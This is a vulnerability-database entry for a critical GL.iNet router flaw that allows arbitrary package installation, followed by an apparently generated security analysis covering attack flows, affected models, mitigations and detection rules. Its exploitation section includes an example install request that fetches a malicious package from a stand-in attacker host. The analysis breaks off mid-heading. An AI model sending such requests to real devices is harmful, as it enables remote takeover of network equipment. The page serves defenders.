CVE-2023-31471
CVE-2023-31471
9.8
CriticalPublished:
Last updated:
Source:cve@mitre.org
Modified
CVSS Vector
v3.1- Attack Vector
- Network
- Attack Complexity
- Low
- Privileges Required
- None
- User Interaction
- None
- Scope
- Unchanged
- Confidentiality
- High
- Integrity
- High
- Availability
- High
Description
An issue was discovered on GL.iNet devices before 3.216. Through the software installation feature, it is possible to install arbitrary software, such as a reverse shell, because the restrictions on the available package list are limited to client-side verification. It is possible to install software from the filesystem, the package list, or a URL.
CVE-2023-31471: Professional Cybersecurity Analysis
Executive Summary
CVE-2023-31471 represents a critical security vulnerability in GL.iNet devices (firmware versions prior to 3.216) that enables arbitrary code execution through insufficient server-side validation of software installation requests. With a CVSS score of 9.8, this vulnerability poses an immediate and severe threat to affected network infrastructure.
1. Vulnerability Assessment and Severity Evaluation
Severity Classification
- CVSS Score: 9.8 (Critical)
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Impact: Complete system compromise (CIA triad fully compromised)
Technical Assessment
The vulnerability stems from a fundamental security architecture flaw: relying exclusively on client-side validation for software installation authorization. This represents a violation of the security principle "never trust the client."
Key Weaknesses:
- Client-side only validation of package sources
- No server-side verification of package authenticity
- Unrestricted installation from multiple sources (filesystem, URL, package list)
- Lack of cryptographic signature verification
- Insufficient access controls on installation functionality
Risk Rating Justification
The 9.8 CVSS score is appropriate due to:
- No authentication required for exploitation
- Remote exploitation capability via network access
- Complete system compromise potential (RCE)
- Network device targeting (affects infrastructure security posture)
- Ease of exploitation (low technical barrier)
2. Attack Vectors and Exploitation Methods
Primary Attack Vectors
Vector 1: Malicious Package Installation via URL
Attack Flow:
1. Attacker identifies vulnerable GL.iNet device (< v3.216)
2. Attacker crafts malicious package (e.g., reverse shell)
3. Attacker hosts package on controlled server
4. Attacker bypasses client-side validation (intercept/modify requests)
5. Attacker submits installation request with malicious URL
6. Device downloads and installs unauthorized package
7. Attacker gains remote code execution
Vector 2: Local Filesystem Exploitation
- Upload malicious package to accessible filesystem location
- Trigger installation from local path
- Bypass package list restrictions entirely
Vector 3: Package List Manipulation
- Intercept legitimate package installation requests
- Modify package identifiers to point to malicious packages
- Exploit lack of integrity checking
Exploitation Techniques
Method 1: Direct API Manipulation
POST /cgi-bin/api/install HTTP/1.1
Host: [target-device-ip]
Content-Type: application/json
{
"package_url": "http://attacker.com/malicious.ipk",
"package_name": "legitimate-looking-name"
}
Method 2: Man-in-the-Middle (MitM)
- Intercept legitimate installation requests
- Replace package sources with malicious alternatives
- Particularly effective on unencrypted management interfaces
Method 3: Cross-Site Request Forgery (CSRF) Chain
- Craft malicious web page that triggers installation
- Social engineer administrator to visit page while authenticated
- Automated exploitation without direct device access
Post-Exploitation Capabilities
Once arbitrary code execution is achieved:
- Persistent backdoor installation
- Network traffic interception (man-in-the-middle positioning)
- Lateral movement to connected networks
- Credential harvesting from device configuration
- Botnet recruitment for DDoS attacks
- VPN/tunnel compromise (common GL.iNet use case)
3. Affected Systems and Software Versions
Affected Products
GL.iNet Router/Network Devices:
- All models running firmware < version 3.216
Commonly Affected Models
GL.iNet manufactures various travel routers and IoT gateways, including:
- GL-AR750S (Slate)
- GL-MT300N-V2 (Mango)
- GL-AR300M (Shadow)
- GL-MT1300 (Beryl)
- GL-AXT1800 (Slate AX)
- GL-A1300 (Slate Plus)
- Other models in the product line
Deployment Contexts at Risk
- Remote workers using GL.iNet VPN routers
- IoT deployments with GL.iNet gateway devices
- Travel/mobile networks (common use case)
- Small office/home office (SOHO) environments
- Industrial IoT implementations
- Penetration testing equipment (ironically, security professionals use these devices)
Version Identification
Administrators can check firmware version via:
- Web interface: System → Firmware
- SSH:
cat /etc/glversion - API endpoint:
/cgi-bin/api/system/info
4. Recommended Mitigation Strategies
Immediate Actions (Priority 1)
1. Firmware Update
# Verify current version
cat /etc/glversion
# Update to version 3.216 or later via:
# - Web UI: System → Upgrade
# - Manual download from https://www.gl-inet.com
Critical: Update to firmware version 3.216 or later immediately.
2. Network Isolation
- Place affected devices behind firewall rules
- Restrict management interface access to trusted networks only
- Implement VLANs to segment vulnerable devices
3. Access Control Hardening
# Disable remote management if not required
# Change default credentials immediately
# Implement strong authentication
Short-term Mitigations (Priority 2)
4. Monitoring and Detection
Deploy monitoring for:
- Unexpected package installation attempts
- Unusual outbound connections from devices
- Changes to installed package lists
- Anomalous process execution
Detection Signatures:
# Monitor for suspicious package installations
LOG: "package install" AND source NOT IN [trusted_repos]
# Network-based detection
ALERT: HTTP POST to /cgi-bin/api/install from untrusted sources
5. Network Segmentation
- Isolate GL.iNet devices on dedicated management VLAN
- Implement strict firewall rules:
- Allow only necessary management protocols
- Whitelist administrator IP addresses
- Block outbound connections to untrusted package sources
6. Web Application Firewall (WAF) Rules
# Block suspicious installation requests
Rule: Block POST requests to /cgi-bin/api/install
containing external URLs in package_url parameter
Long-term Security Measures (Priority 3)
7. Security Architecture Review
- Implement defense-in-depth strategies
- Regular vulnerability assessments
- Penetration testing of network infrastructure
8. Configuration Management
- Maintain inventory of all GL.iNet devices
- Automated firmware version tracking
- Centralized configuration management
9. Incident Response Preparation
- Develop playbooks for device compromise scenarios
- Establish baseline configurations for forensic comparison
- Implement automated backup procedures
Compensating Controls (If Update Not Immediately Possible)
# 1. Disable software installation feature entirely
# (via custom firewall rules or interface modification)
# 2. Implement strict egress filtering
iptables -A OUTPUT -p tcp --dport 80 -j DROP
iptables -A OUTPUT -p tcp --dport 443 -j DROP
# (Allow only specific trusted repositories)
# 3. Enable comprehensive logging
# Configure syslog forwarding to SIEM
5. Impact on Cybersecurity Landscape
Strategic Implications
1. IoT/Edge Device Security Concerns
This vulnerability exemplifies ongoing challenges in IoT security:
- Insufficient security-by-design principles
- Client-side validation dependencies
- Limited security resources in embedded systems
- Difficulty in patch deployment for distributed devices
2. Supply Chain Considerations
- GL.iNet devices are popular in security/privacy communities
- Compromise could affect security-conscious users
- Potential for targeted attacks against specific user demographics
- Trust implications for "security-focused" hardware vendors
3. **Attack Surface
References
cve@mitre.org
https://github.com/gl-inet/CVE-issues/blob/main/3.215/Abuse_of_Functionality_leads_to_RCE.mdcve@mitre.org
https://www.gl-inet.comaf854a3a-2127-422b-91ae-364da2661108
https://github.com/gl-inet/CVE-issues/blob/main/3.215/Abuse_of_Functionality_leads_to_RCE.mdaf854a3a-2127-422b-91ae-364da2661108
https://www.gl-inet.com